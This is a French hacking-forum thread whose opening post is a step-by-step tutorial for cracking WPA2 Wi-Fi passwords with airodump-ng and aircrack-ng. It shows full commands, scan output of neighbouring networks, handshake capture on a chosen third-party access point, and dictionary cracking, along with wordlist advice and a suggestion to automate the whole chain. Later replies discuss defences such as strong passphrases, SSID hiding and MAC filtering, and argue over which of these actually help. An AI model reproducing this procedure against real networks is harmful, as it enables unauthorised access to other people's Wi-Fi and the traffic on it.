• STATISTIQUES
  • Il y a eu un total de 1 membres et 15728 visiteurs sur le site dans les dernières 24h pour un total de 15 729 personnes!


    Membres: 2 433
    Discussions: 3 585
    Messages: 32 831
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Cyber-Hacker
    CH - Cyber Hacker est un jeu par navigateur de simulation de hack, programmez et envoyez vos virus et piratez les aut...
    Hacking
    [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [EN] Net Force
    Javascript: 9, Java Applets: 6, Cryptography: 16, Exploits: 7, Cracking: 14, Programming: 13, Internet: 15, Steganograph...
    Challenges
    [EN] phrack
    Lot's of stuff !
    Hacking
    [EN] Big-Daddy
    Big-Daddy est site internet communautaire avec un effectif diversifié, y compris des artistes, des programmeur...
    Hacking
    [FR] Microcontest
    Cryptographie: 7, Mathématiques: 8, Image Son Vidéo: 5, Intelligence artificielle: 3, Réseau: 2, Divers: 7, Phy...
    Challenges
    [FR] NewbieContest
    Nous vous proposons une série de challenges regroupant plusieurs domaines allant de l'exploitation de fail...
    Hacking

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




[HowTo] Cracker un réseau WPA2

Salut Smile

Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps.

Tout se passe sous BackTrack (version 5 R3). Pour une performance accrue, j'utilise mon ordinateur fixe. Puisqu'il n'a pas de carte réseau sans-fil, je me suis acheté un bon truc à 15$: $link$

On initialise d'abord l'interface wlan0:
Code :
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng stop mon0

Puis, on se renseigne sur les réseaux environnants:
Code :
airodump-ng wlan0

On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$)

Code :
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                              
00:$$:E3:$$:64:$$  -26      183    15982    0   6  54e. WPA2 CCMP   PSK  $$$                                                                                                          
64:$$:D7:$$:47:$$  -52      287       32    0   1  54e  WPA2 CCMP   PSK  $$$                                    
80:$$:AB:$$:00:$$  -54      214        5    0  11  54e  WPA2 CCMP   PSK  $$$                                  
AC:$$:0B:$$:CD:$$  -65      169        0    0   4  54e  WPA2 CCMP   PSK  $$$                                    
24:$$:11:$$:42:$$  -67      247        1    0   1  54e. WPA2 CCMP   PSK  $$$                  
00:$$:C9:$$:7C:$$  -67      246       70    0   1  54e  WPA2 CCMP   PSK  $$$                                                          
00:$$:A6:$$:C9:$$  -70      311      297    0   8  54 . OPN              $$$                                                              
00:$$:A6:$$:CA:$$  -72       39      610    0   4  54 . OPN          
$$$                                                                                                                                                                                                                      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                                  
80:$$:AB:$$:00:$$  00:$$:20:$$:BC:$$  -54   36e- 1e     0       47  $$$                                        
80:$$:AB:$$:00:$$  18:$$:96:$$:B5:$$  -74    1e- 1      0       37                                                    
24:$$:11:$$:42:$$  C4:$$:FE:$$:2B:$$  -74    1e- 1      0       10  $$$                          
00:$$:A6:$$:C9:$$  98:$$:F7:$$:7E:$$   -1    1 - 0      0       26                                                  
00:$$:A6:$$:CA:$$  38:$$:3C:$$:3D:$$   -1    1 - 0      0        4                                                  
00:$$:A6:$$:CA:$$  84:$$:88:$$:14:$$   -1   11 - 0      0        1                                                  
00:$$:A6:$$:CA:$$  98:$$:82:$$:A9:$$   -1    5 - 0      0       44                                                  
00:$$:A6:$$:CA:$$  00:$$:04:$$:18:$$   -1    5 - 0      0       48

Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". Dans ce cas, l'AP dont le MAC est 00:$$:E3:$$:64:$$ semblerait optimal. Il ne l'est en fait pas, puisqu'après une longue surveillance on s'aperçoit qu'il n'y a qu'un client de connecté et un flot de données discontinu. On veut pouvoir attraper les utilisateurs qui se connectent, pas ceux qui sont connectés. On choisit alors l'AP avec le MAC 64:$$Big Grin7:$$:47:$$.

On utilise toujours airodump, mais cette fois on restreint son champ d'analyse.

Code :
airodump-ng -c 1 --bssid 64:$$:D7:$$:47:$$ -w psk wlan0

Les arguments sont les suivants:
-c -> canal radio de l'AP
--bssid -> adresse MAC de l'AP
-w -> préfixe de l'output (.cap si format non défini)

On se retrouve alors avec ceci:

Code :
CH  1 ][ Elapsed: 6 mins ][ 2013-11-16 17:58 ][ fixed channel wlan0: 13              
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
64:87:D7:02:47:59  -51   4      681       53    0   1  54e  WPA2 CCMP   PSK  oso-4998
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Manque de bol, aucun utilisateur ne s'est connecté. Il faudra donc laisser le programme tourner quelques heures, voire quelques jours. Puisque cela prend forcément du temps, on va se mettre à analyser d'autres réseaux. Je vous déconseille fortement de faire cela à moins que vous ayez une carte réseau par AP "sniffé". En effet, l'antenne devra jongler entre deux canaux (ou plus) et peut alors potentiellment manquer un handshake.

Une fois le handshake trouvé, vous le verrez en haut à droite de la page: (fait sur mon propre réseau cette fois, car l'autre ne coopérait pas)

Code :
CH 13 ][ Elapsed: 48 mins ][ 2013-11-16 18:01 ][ WPA handshake: 00:$$:F6:$$:B5:$$    
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
00:$$:F6:$$:B5:$$  -40   1     2216    16952    3  13  54e. WPA2 CCMP   PSK  SAFIR    
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe            
                                                                                      
00:$$:F6:$$:B5:$$  04:$$:95:$$:CC:$$  -127    0e- 0e     0    15487                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    0e- 0e   263     1145                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    1e- 0    708     1375

Notez que le handshake n'apparaît uniquement lorsqu'un appareil inconnu se connecte (et entre alors le mot de passe). C'est précisément à ce moment-là que la négociation (de la clef ?) a lieu. Si un appareil connu (avec mot de passe déjà enregistré) se connecte, vous n'aurrez pas le handshake.

Une fois le handshake en main, on peut procéder au crack:

Code :
aircrack-ng -a 2 -b 00:$$:F6:$$:B5:$$ -l key.txt -w /media/Data/18_in_1.lst /root/psk-01.cap

À nouveau, les arguments sont les suivants:
-a -> mode de crack (1 pour WEP, 2 pour WPA(2))
-b -> adresse MAC de l'AP
-l -> nom et format du fichier output (la clef)
-w -> chemin de la wordlist

Code :
Aircrack-ng 1.1 r2178


                   [00:00:09] 57144 keys tested (5881.08 k/s)


                       Current passphrase: 121212poohbear            


      Master Key     : 94 52 0A 5A 45 8A 20 4A 13 7B C2 62 8A 1C BF 89
                       53 A2 BB 4B 96 9E BD FF 64 92 4D 3D 8B 11 D9 F9

      Transient Key  : 48 76 A2 87 B0 38 E1 02 81 A5 82 04 2E 57 09 21
                       CB ED 2C 86 67 9A D6 E2 08 9B 60 7C 22 5E 82 28
                       2D 8A 16 35 3B B3 49 00 73 48 A2 E7 2F 28 61 B1
                       90 59 02 70 7E 96 A3 C2 AF 66 C0 E6 C1 35 F0 0A

      EAPOL HMAC     : E7 5B 6C 1D D0 D5 15 9B C3 D2 5D B2 4D DF 90 DC

On peut voir qu'aircrack teste une à une toutes les clefs de la wordlist. J'ai préféré utiliser mon ordinateur fixe car son taux de test (~5900 clefs/sec) est bien plus important que celui d'un portable, par exemple. Étant donné que l'on ne peut pas vraiment combler ce manque sur un portable, j'ai pensé à une certaine méthodologie:

1) Enregistrer l'output d'airodump sur un ordinateur distant en spécifiant un chemin réseau (envoyer le tout via Internet sera trèèès long)
2) Exécuter aircrack sur la même machine distante en spécifiant l'output vers le portable

L'idéal serait un accès SSH ou autre. Overclocker le CPU aide grandement. De plus, les CPUs hautement multi-threads seront avantagés (j'ai 6C/12T ici).

Puisque la wordlist n'est pas optimale pour la clef de mon AP, aircrack ne la trouvera probablement jamais. C'est pourquoi le choix de la wordlist est très important quand à l'obtention du mot de passe d'un AP. Vous pouvez générer toutes les possibilités de min-maj-num jusqu'à 16 caractères mais bonjour l'espace disque gaspillé. C'est pourquoi il faut faire une wordlist à base de mots (vbtrTdbbr%2+ est assez dur à mémoriser, comparé à djeanwifi251076). Je pense que trouver la bonne wordlist est plus dur que trouver le handshake (relativement simple, il suffit d'un peu de patience).

En ce qui concerne la création de worlists, crunch (Linux) et L517 (Windows) font très bien leur boulot. Le premier est plus complet à mes yeux. Une bonne explication de son fonctionnement: http://adaywithtape.blogspot.ch/2011/05/...h-v30.html

Bref, voilà comment ça se présente pour cracker du WPA.
16-11-2013, 21h35
Message : #1
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
w00t merci pour ce tuto sur comment font les pirates, sinon du coté white hat de la chose on a quoi comme solutions pour empêcher ça ? ça peut faire l'objet d'un tuto aussi ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
16-11-2013, 21h39 (Modification du message : 16-11-2013, 21h40 par Kiwazaru.)
Message : #2
Kiwazaru Hors ligne
Padawan d'un super escargot
*



Messages : 284
Sujets : 26
Points: 139
Inscription : Mar 2012
RE: [HowTo] Cracker un réseau WPA2
Il serait bien de faire une lexique de tous les termes que tu emplois dans ton paper. Si on n'est pas familier avec tous ces termes, je pense qu'on y est vite perdu Wink
Sinon oui, il serait intéressant d'avoir un avis sur la sécurisation/mise en place de protection contre cette attaque Smile
Toucher au Kernel, c'est un peut comme se shooter au LSD, on pense pouvoir tout faire mais ça finit souvent mal.
16-11-2013, 21h50 (Modification du message : 16-11-2013, 21h51 par Loup.)
Message : #3
Loup Hors ligne
Membre actif
*



Messages : 85
Sujets : 8
Points: 8
Inscription : Sep 2013
RE: [HowTo] Cracker un réseau WPA2
Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^)

Premièrement, la chose que personne ne fait, mais que tout le monde doit faire...
Changer le mot de passe de connexion au routeur!
(pour ceux qui ne comprennent pas là où je veux en venir: http://i.imgur.com/6jaSToz.png)
Cela évitera à quelqu'un de connecté sur ta box, de changer certains paramètres qui te feront bien chier par la suite.

Secondement, comme on le vois, une attaque par "wordlist" est effectuée c'est à dire que si le mot de passe que tu as choisi n'est pas dans ce wordlist, il ne pourra bien évidemment pas être cracké.

Les modes WPA/WPA2 proposent ces 3 longueurs:
- WPA - 64-bit - 8 Characters
- WPA2 - 160-bit - 20 Characters
- WPA2 - 504-bit - 63 Characters

Ce qui donne une clé de ce genre en HEX:
6C215A4533456E3544634A6567364C6C26473033476150723075575E434A4268565439727253612B57566B6739483726726D52416758372A3D54734B244D4D

On voit tout de suite que c'est plus sécurisé qu'un WPA du type:
66F9252255FAE25D55C799E766

tout dépend aussi du mot de passe en ascii que vous entrez c'est sur qu'un buffer overflow de 0x41
un wordlist peut le contenir :)

Dernier point que j'aborde ici pour ne pas partir trop loin (ce n'est pas un tutoriel hein :p)

-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)


Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien :) (sauf si on a eu recours au social engineering)

(16-11-2013, 21h50)Loup a écrit : Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^)

Premièrement, la chose que personne ne fait, mais que tout le monde doit faire...
Changer le mot de passe de connexion au routeur!
(pour ceux qui ne comprennent pas là où je veux en venir: http://i.imgur.com/6jaSToz.png)
Cela évitera à quelqu'un de connecté sur ta box, de changer certains paramètres qui te feront bien chier par la suite.

Secondement, comme on le vois, une attaque par "wordlist" est effectuée c'est à dire que si le mot de passe que tu as choisi n'est pas dans ce wordlist, il ne pourra bien évidemment pas être cracké.

Les modes WPA/WPA2 proposent ces 3 modes:
- WPA - 64-bit - 8 Characters
- WPA2 - 160-bit - 20 Characters
- WPA2 - 504-bit - 63 Characters

Ce qui donne une clé de ce genre en HEX:
6C215A4533456E3544634A6567364C6C26473033476150723075575E434A4268565439727253612B57566B6739483726726D52416758372A3D54734B244D4D

On voit tout de suite que c'est plus sécurisé qu'un WPA du type:
66F9252255FAE25D55C799E766

tout dépend aussi du mot de passe en ascii que vous entrez c'est sur qu'un buffer overflow de 0x41
un wordlist peut le contenir :)

Dernier point que j'aborde ici pour ne pas partir trop loin (ce n'est pas un tutoriel hein :p)

-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)


Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien :) (sauf si on a eu recours au social engineering)
16-11-2013, 23h32
Message : #4
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(16-11-2013, 21h35)gruik a écrit : sinon du coté white hat de la chose on a quoi comme solutions pour empêcher ça ? ça peut faire l'objet d'un tuto aussi ?

Il essaye de cracker le password avec une wordlist, pour "sécuriser" une longue chaine aléatoire suffit, pas besoin d'un tuto Smile
17-11-2013, 00h18
Message : #5
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(16-11-2013, 23h32)c4ffein a écrit : Il essaye de cracker le password avec une wordlist, pour "sécuriser" une longue chaine aléatoire suffit, pas besoin d'un tuto Smile

oui oui j'entends bien mais c'était surtout pour mettre un peu l'accent sur le coté "white hat" inhérent à n-pn et l'occasion d'une réflexion rapide sur tout ça

quant à faire un tuto je suis d'accord qu'en l'occurrence il n'y a probablement pas de quoi faire, les attaques sur WPA/WPA2 n'ont pas évolué d'un iota depuis plus de 5 ans et la sécurité du wifi, hors mot de passe, repose sur le design et l’implémentation des "box" diverses, lesquelles sont par défaut relativement bien sécurisées désormais sans parler des efforts un peu partout de communication sur le sujet

donc concrètement on parle d'un "hacking" qui consiste à tomber sur un pigeon qui aura choisi un mot de passe faible ou dont la box est toujours la même depuis 10 ans et carbure toujours au WEP, sans être bégueule il s'agit tout de même d'être conscient de ce que l'on fait, un peu comme si l'on écrivait des tutos sur comment repérer les pigeons à racketter
Citation :"choisissez bien votre cible, préférez des personnes vêtues de manteaux amples avec de grandes poches, les femmes seules avec une poussette sont des cibles idéales car elles ne vous courront pas après si vous vous faites gauler..."

il y a 15 ans de ça on expliquait à qui voulait l'entendre que "pour pouvoir combattre les pirates il faut penser comme eux", nul doute que le propos est toujours le même, pas vrai ? Wink

heureusement on est au sein d'une communauté de hackers white-hat et notre soif d'apprendre des choses intelligentes nous pousse à nous poser des questions qui vont plus loin que ces pirates à 2 balles d'Anonymous, la différence c'est que nous quand on parle de comment pirater on sait comment ça fonctionne en dessous n'est-ce pas, la tête des protocoles 802.11x, le chiffrement utilisé, le modèle de crypto employé etc.
dès lors on pourrait se poser tout un tas de questions du genre :
* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ?
* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ?
* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ?
* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ?
* etc.

finalement au delà de l'éthique personnelle, la seule limite est l'imagination non ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
17-11-2013, 00h34
Message : #6
b0fh Hors ligne
Membre actif
*



Messages : 210
Sujets : 17
Points: 309
Inscription : Jul 2012
RE: [HowTo] Cracker un réseau WPA2
Citation :-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)

Je dois être un peu bête, mais j'ai de la peine à comprendre en quoi c'est une bonne idée. Sachant que le SSID est diffusé en clair dans chaque trame, ça n'apporte donc absolument aucune sécurité, en revance ça force le client a lancer des requêtes d'association dans le vide, et offre donc une opportunité supplémentaire d'attaquer le client avec un faux AP. Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ?
17-11-2013, 00h55 (Modification du message : 17-11-2013, 01h04 par Serphentas.)
Message : #7
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
Pour contrer ce genre d'attaque, on doit se munir d'un bon mot de passe (et éviter le Wi-Fi Protected Setup).

Pour calculer le nombre de possibilités à tester pour retrouver votre mot de passe, essayez ceci:
2^n où n=(log(x)/log(2)*k)

n correspond à l'entropie de votre mot de passe. Plus il est élevé, plus il faudra tester de combinaisons. On divise en général le 2^n par 2, puisqu'on teste rarement toutes les possibilités. Convertissez ensuite ce résultat en minutes, heures, jours, années... suivant la vitesse d'essai (x mots de passe/sec).

Puisque k est un coefficient, privilégiez un mot de passe long. Évitez aussi les mots et/ou phrases, puisqu'une wordlist de mots est plus rapidement faite qu'une à base de caractères random.

Comme dit plus haut, ne pas émettre (broadcast) son (E)SSID est utile pour que les gens "normaux" ne voient pas votre réseau. Par contre, un pirate muni de la suite airecrack ne sera pas désavantagé puisqu'il n'a pas besoin de l'(E)SSID. Cela peut néanmoins l'éloigner s'il ne fait pas une recherche approfondie des réseaux environnants.

Quant aux mots utilisés

**suite**

Quant au vocabulaire, je mets ici en attendant une future modification:

MAC: Media Access Control, c'est l'adresse (unique) matérielle d'une carte réseau
AP: Access Point, ou point d'accès (Wi-Fi)
sniff: littéralement renifler, le fait d'écouter les données et informations qui passent
handshake: négociation, c'est un transit de données fait en vu de l'établissement d'une connexion/lien de communication (ici: radio)

Pour répondre à gruik:

* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.
* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post
* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).
* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

Enfin:

Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ? => Tout est dangereux. Un inconnu qui télécharge du pr0n -18 avec ta connexion et tu diras bonjour à la police. Avec un MITM tu te fais choper des informations sensibles.
17-11-2013, 01h08 (Modification du message : 17-11-2013, 01h15 par Loup.)
Message : #8
Loup Hors ligne
Membre actif
*



Messages : 85
Sujets : 8
Points: 8
Inscription : Sep 2013
RE: [HowTo] Cracker un réseau WPA2
@b0fh
Comme l'a très bien dit Serphentas, c'est utile contre les utilisateurs lambda.
Mais cacher son SSID n'est pas si une bonne idée que ça en y réfléchissant (je me contredis là :p) quelqu'un pourrait très bien utiliser un rogue AP à l’insu d'autres utilisateurs...

M'enfin, cacher son SSID ne sert pas à grand chose, c'est juste une "mini-protection" contre les petits-joueurs Smile

Arf, je viens de relire ton post et je re-dis un peu tout ce que tu as dit :'=)
17-11-2013, 01h23
Message : #9
b0fh Hors ligne
Membre actif
*



Messages : 210
Sujets : 17
Points: 309
Inscription : Jul 2012
RE: [HowTo] Cracker un réseau WPA2
Pardon, mais a l'heure ou n'importe quel mongolien peut installer un sniffer tout automatique sur son smartphone, ton SSID caché ne t'apporte strictement zéro, zilch, nada, que d'alle, néant total, absolument aucune sécurité supplémentaire par rapport a un mot de passe.

A propos de l'entropie:
Citation :2^n où n=(log(x)/log(2)*k)
est juste une manière inutilement compliquée d'écrire x^k, ou x est la taille de l'alphabet et k la longueur, les noms sont bizarres. Quoi qu'il en soit, ça n'a pas de sens de parler d'entropie d'un mot de passe particulier (l'entropie d'une donnée connue est nulle), c'est une borne maximum sur l'entropie vue par un attaquant qui suppose une distribution aléatoire équiprobable des mots de passe.

Et pour ce qui est du danger des attaques... en te MITMisant on peut aussi remplir le cache de ton navigateur avec du pedopr0n, et tu ne pourras pas invoquer un défaut de sécurisation de ta connexion internet. Cet argument ne tient pas.
17-11-2013, 02h26
Message : #10
Ant4rt1c Hors ligne
Membre
*



Messages : 27
Sujets : 1
Points: -1
Inscription : Oct 2013
RE: [HowTo] Cracker un réseau WPA2
Citation :Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien Smile

je ne m'y connais pas encore très bien en réseau et je ne suis pas sur de comprendre ton commentaire. Tu veux dire qu'on ne peut pas savoir si un nouvel utilisateur se connecte a la box si on y est pas connecté ?
17-11-2013, 02h40
Message : #11
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik:

ouai, c'était un ensemble de questions non-exhaustif plus destiné à faire réfléchir qu'à assouvir réellement ma curiosité personnelle en fait Wink

Citation :* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.

sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple

Citation :* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post

ok mettons que le sujet lui-même doit pouvoir occasionner un article/tutoriel à part, celui de la stratégie des mots de passe, et qui serait un peu plus étoffé qu'une seule ligne perdue dans un tuto

Citation :* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).

bannir sur l'adresse MAC c'est un peu comme bannir un browser sur son user-agent finalement, c'est d'ailleurs souvent la première chose qu'on fait de modifier son adresse MAC, sachant que selon la box le propos est de prendre précisément la MAC du client légitime pour tromper l'association qui est faite, bannir l'adresse MAC revient à se couper les noix tout seul dans ce cas ce serait pas vraiment judicieux

Citation :* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

yep, là encore merci de me confirmer que c'est possible, c'est précisément ce sur quoi je voulais attirer l'attention
je me dis qu'un article autour d'un ptit code perso qui par exemple lirait en temps réel le log de connexion du routeur comme tu disais, ou tenterait de découvrir des machines sur le réseau à l'aide de {nmap,hping,tshark,scapy,zob,...} et le cas échéant remonterait une alerte sous forme d'un popup (...) serait finalement tout aussi intéressant qu'un tuto sur comment utiliser aircrack-ng pour pirater son voisinage
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
17-11-2013, 20h44 (Modification du message : 17-11-2013, 23h11 par Di0Sasm.)
Message : #12
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit : sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple
La il crack sans injection de packet a ce que j'ai compris, non?
18-11-2013, 00h36
Message : #13
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non?

oui, au temps pour moi je me suis mélangé les pinceaux Wink
reste que ce serait potentiellement encore plus facile à détecter du coup...
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
18-11-2013, 00h51
Message : #14
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit :
(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik:

ouai, c'était un ensemble de questions non-exhaustif plus destiné à faire réfléchir qu'à assouvir réellement ma curiosité personnelle en fait Wink

Autant pour moi Smile


Citation :* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.

sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple

Il faudrait alors programmer l'AP de telle sorte à ce qu'il se protège en envoyant des fake IV aux attaquants.

Citation :* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post

ok mettons que le sujet lui-même doit pouvoir occasionner un article/tutoriel à part, celui de la stratégie des mots de passe, et qui serait un peu plus étoffé qu'une seule ligne perdue dans un tuto

Un tuto sur les mots de passe ? Pourquoi pas.

Citation :* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).

bannir sur l'adresse MAC c'est un peu comme bannir un browser sur son user-agent finalement, c'est d'ailleurs souvent la première chose qu'on fait de modifier son adresse MAC, sachant que selon la box le propos est de prendre précisément la MAC du client légitime pour tromper l'association qui est faite, bannir l'adresse MAC revient à se couper les noix tout seul dans ce cas ce serait pas vraiment judicieux

Dans ce cas, tu peux faire un script qui blacklist automatiquement les adresses MAC qui ne sont pas whitelistées (tes appareils). Il suffit alors d'entrer manuellement ses nouveaux appareils afin de les utiliser.

Citation :* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

yep, là encore merci de me confirmer que c'est possible, c'est précisément ce sur quoi je voulais attirer l'attention
je me dis qu'un article autour d'un ptit code perso qui par exemple lirait en temps réel le log de connexion du routeur comme tu disais, ou tenterait de découvrir des machines sur le réseau à l'aide de {nmap,hping,tshark,scapy,zob,...} et le cas échéant remonterait une alerte sous forme d'un popup (...) serait finalement tout aussi intéressant qu'un tuto sur comment utiliser aircrack-ng pour pirater son voisinage

Ça peut se tout à fait faire. Me faudra juste du temps, car je n'ai pas encore scripté quoi que ce soit.

(17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non?
